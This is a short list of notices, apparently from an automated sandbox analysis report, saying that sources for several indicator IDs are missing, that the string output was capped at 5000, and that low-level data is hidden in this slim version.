- Not all sources for indicator ID "api-1" are available in the report
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "target-25" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report